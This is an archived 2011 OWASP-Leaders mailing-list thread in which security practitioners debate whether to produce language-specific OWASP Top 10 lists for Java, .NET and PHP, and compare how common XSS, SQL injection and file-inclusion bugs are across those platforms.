[Owasp-leaders] OWASP Top 10 2012

Mark Curphey mark at curphey.com
Fri Oct 7 11:01:06 EDT 2011


I have always hoped for ab unbiased architectural reference of how the framework deal with things. Ruby has 3 safe modes for sandboxing from the OS, .net the clr, java jvm etc. Thus is a big job but would be massively valuable and all framework have this do the effort would be normalizing data.

Sent from my iPhone

On Oct 7, 2011, at 7:54 AM, Chris Schmidt <chris.schmidt at owasp.org> wrote:

> I agree with you to an extent Dave. However, I think there are some distinct ordering differences between the languages as well. For instance, it is pretty rare that I have seen Remote/Local File Inclusion bugs in Java or .Net apps, where they are found in PHP apps quite a bit for frequently. I would say the same even about SQL Injection except that I think I have seen a good deal more in .Net and PHP than in Java. While there will definately be quite a bit of crossover between the overall top 10 and the language top 10s I believe that there are enough differences in order and risk associated with the issues to warrant more granular documents to compliment the master top 10. I also believe there should be     cohesiveness between these documents however. For instance, I may be looking at SQL Injection for .Net and think to myself, I wonder if my org also has this same issue in our Java or .Net applications. 
> 
> I think there is value in doing this - if nothing else I think there is some research/metrics value in the discovery process, even if the outcome of that discovery process indicates that separation is not worth the effort investment. 
> 
> I believe that I have seen some numbers out of the whitehat crew that could provide some initial insight into the intersections and pieces across different languages and frameworks.
> 
> On 10/7/2011 8:44 AM, Erwin Geirnaert wrote:
>> 
>> Hi Dave,
>> 
>> That's what I did with the OWASP Top 10 for JEE 2007 where I only described the issue for JEE and the necessary countermeasures.
>> But the Top 10 used was the general one, and not specific for Java so for example you have the concept of malicious file execution where you include PHP file from a malicious origin in a parameter and that doesn't apply to Java or .NET
>> 
>> Discussing with a Java hardcore developer that Spring Security is not really a solution for the OWASP Top 10 is a difficult job :)
>> 
>> Best regards,
>> 
>> Erwin
>> 
>> Van: Dave Wichers <dave.wichers at owasp.org>
>> Datum: Fri, 7 Oct 2011 07:39:07 -0700
>> Aan: 'Venkatesh Jagannathan' <venki at owasp.org>, Erwin Geirnaert <erwin.geirnaert at zionsecurity.com>
>> CC: "owasp-leaders at lists.owasp.org" <owasp-leaders at lists.owasp.org>
>> Onderwerp: RE: [Owasp-leaders] OWASP Top 10 2012
>> 
>> I agree with Venkatesh here. I actually think .NET is MORE secure than Java in many respects. However, I think because Microsoft actually tried to build some security into .NET in certain areas, like automatic XSS defenses, they shot themselves in the foot to some degree because they provided .Net developers with a false sense of security in that area. Since their anti-XSS mechanism wasn’t actually bullet proof, it actually ended up causing .NET apps to have MORE XSS vulns than Java apps on average. However, the .NET developers got this ‘benefit’ for free, i.e., they didn’t have to do anything to get to their level of XSS vulns, but the Java developers had to work really hard to actually get their XSS vuln count down because Java had no built in anti-XSS defenses. If you built the same App in both Java and .NET and the developers didn’t specifically try to stop XSS vulns, the .NET app would actually have far less XSS than the Java one.
>>  
>> I’m not a PHP expert so I can’t comment there.
>>  
>> Rather than having a ‘different’ Top 10 for each language, I think it WOULD be really cool to have a document like, How to address the OWASP Top 10 in Java/.NET/PHP, etc. Then the docs would be aligned with each other, rather than out of sync/different order/etc., which would be very confusing. However, if I was a developer for language X, and there was a Top 10 for that language, that would be very helpful for me, and not confusing since it covers the same stuff as the ‘standard’ Top 10.
>>  
>> What do you think about this variant on your idea?
>>  
>> -Dave
>>  
>> From: owasp-leaders-bounces at lists.owasp.org [mailto:owasp-leaders-bounces at lists.owasp.org] On Behalf Of Venkatesh Jagannathan
>> Sent: Friday, October 07, 2011 10:29 AM
>> To: Erwin Geirnaert
>> Cc: owasp-leaders at lists.owasp.org
>> Subject: Re: [Owasp-leaders] OWASP Top 10 2012
>>  
>> Hi Erwin,
>>     I slightly disagree here. Whatever issue is present in .NET, the same can be replated very much in Java. When I give trainning on writing secure code, based on top 10, i provide samples on both .net & java way.
>> To me, creating a seperate material for java/.net would at some point in time end up in too many "issuelets" that are language specific and dilute the concept of OWASP top 10.
>>  
>> I think the way we should address this is: Provide examples in all languages would make more sense than creating one for each language :)
>>  
>> Thanks & Regards,
>> ~Venki
>> 
>> On Fri, Oct 7, 2011 at 7:47 PM, Erwin Geirnaert <erwin.geirnaert at zionsecurity.com> wrote:
>> Hi list,
>>  
>> During some discussions this week with Java developers while giving a security training I got the following remark: "why are there so many ASP.NET/PHP issues in the OWASP Top 10, is Java more secure"?
>>  
>> So what I propose is to create a specific OWASP Top 10 for different technologies: Microsoft, Java, PHP and we can still have one global Top 10.
>> Ofcourse based on the CVE database but it will be more clear for the developers and I think that the OWASP Top 10 for Java will be very different than OWASP Top 10 for PHP.
>>  
>> Best regards,
>>  
>> Erwin
>> 
>> _______________________________________________
>> OWASP-Leaders mailing list
>> OWASP-Leaders at lists.owasp.org
>> https://lists.owasp.org/mailman/listinfo/owasp-leaders
>> 
>>  
>> 
>> 
>> _______________________________________________
>> OWASP-Leaders mailing list
>> OWASP-Leaders at lists.owasp.org
>> https://lists.owasp.org/mailman/listinfo/owasp-leaders
> 
> _______________________________________________
> OWASP-Leaders mailing list
> OWASP-Leaders at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-leaders
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-leaders/attachments/20111007/2e8e0079/attachment.html 


More information about the OWASP-Leaders mailing list